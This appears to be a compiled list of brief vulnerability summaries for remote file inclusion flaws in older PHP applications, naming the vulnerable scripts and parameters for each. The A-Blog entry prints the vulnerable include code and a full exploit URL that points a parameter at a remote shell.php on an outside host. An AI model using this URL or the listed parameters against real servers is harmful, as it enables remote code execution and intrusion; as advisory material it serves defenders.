Kietu? version 4.0.0b2z is vulnerable to a Remote File Inclusion vulnerability due to a lack of sanitization of user input in the hit.php file. An attacker can exploit this vulnerability by sending a malicious URL in the url_hit parameter. This will allow the attacker to execute arbitrary code on the vulnerable server.
paBugs 2.0 Beta 3 is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application. This may facilitate unauthorized access; other attacks are also possible.
A-Blog is vulnerable to a remote file include vulnerability. The vulnerable code is present in the menu.php file located in the navigation directory. The vulnerable code is <?php include ("$navigation_start"); ?> and <?php include("$navigation_middle"); ?>. An example exploit is http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?. The solution is to include the mainfile.php in the page.
A vulnerability exists in webnews v1.4 due to improper sanitization of user-supplied input in the 'WN_BASEDIR' parameter of the 'parse/parser.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the 'WN_BASEDIR' parameter.
A vulnerability exists in faceStones personal version v2.0.42, due to improper validation of user-supplied input in the 'objpath' parameter of the 'fs_form_links.php' script. An attacker can exploit this vulnerability to include arbitrary remote files, leading to arbitrary code execution on the vulnerable system.
A remote file inclusion vulnerability exists in BrudaGB v1.1 and v1.0. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.
A vulnerability exists in BrudaNews v1.1 and v1.0 which allows a remote attacker to include a file from a remote host. The vulnerability is due to the 'o' parameter in the 'admin/index.php' script not properly sanitizing user-supplied input. This can be exploited to include arbitrary files from remote hosts by passing an URL as the 'o' parameter. Successful exploitation requires that 'allow_url_fopen' is enabled.
A vulnerability exists in Minerva <= v238, which allows a remote attacker to include a file from a remote location via the phpbb_root_path parameter in the admin/admin_topic_action_logging.php script. An attacker can exploit this vulnerability to include arbitrary files from remote locations, which can lead to the execution of arbitrary code on the vulnerable system.
A vulnerability exists in Software PBLang <= v4.66z due to improper validation of user-supplied input in the 'temppath' parameter of the 'templates/pb/language/lang_nl.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the 'temppath' parameter.
Polaring is vulnerable to a remote file include vulnerability. The vulnerable code is located in the general.php file in the /view/ directory. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file path in the _SESSION['dirMain'] parameter. This can allow an attacker to execute arbitrary code on the vulnerable system.
Services By CQR